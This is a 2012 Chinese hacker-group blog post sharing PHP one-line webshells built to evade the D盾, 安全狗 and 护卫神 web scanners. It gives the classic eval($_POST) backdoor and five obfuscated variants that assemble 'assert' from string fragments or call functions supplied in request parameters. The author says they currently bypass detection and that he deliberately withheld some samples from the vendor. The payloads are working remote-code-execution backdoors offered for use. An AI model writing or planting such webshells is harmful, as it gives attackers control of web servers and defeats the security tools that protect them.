注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

发几个过D盾Web查杀/安全狗/护卫神的PHP免杀一句话WebShell  

2012-12-29 14:23:43|  分类: 工具收集 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
发几个过D盾Web查杀/安全狗/护卫神的一句话WebShell - 拉登哥哥 - K8拉登哥哥s Blog

大家可以看到上图 只是有一部分被杀

最典型最原始的一句话 被杀
<?php @eval($_POST['k8']);?>

下面几个都是变种 不被杀
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?>

<?$_POST['k']($_POST['8']);?>

<?php $k = str_replace("8","","a8s88s8e8r88t");
$k($_POST["8"]); ?>

<?php $_GET['k8']($_POST['k8']);?>

<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["k8"]);  ?>

大马的话 Darkshell.php 这个在K8信息安全工具包 PHP马那里有

上面的目前   全过D盾  下一版本 可能就被杀了 因为样本我提交给阿D了
当然只是提交了一部分 还是留了一些过的 但是我不知道别人提供的样本
有没有 那些我没被杀的特征出现 如果有 我手上留的 也会被杀发几个过D盾Web查杀/安全狗/护卫神的一句话WebShell - 拉登哥哥 - K8拉登哥哥s Blog

另外那条"哈巴狗" 和"八神" 我就不测了 之前都是过的 上面都是变异的写法
他们的特征应该都没收集有多少 有些特征可以说是正常行为也是那样写
不好判定成WebShell  要不然误报   有些特征作者都想到了 但是不好列为特征来杀

关于PHP的免杀 大家只要熟练使用这文章里的相关函数就OK了
http://qqhack8.blog.163.com/blog/static/114147985201211292209893/

发几个过D盾Web查杀/安全狗/护卫神的一句话WebShell - 拉登哥哥 - K8拉登哥哥s Blog
  评论这张
 
阅读(6905)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016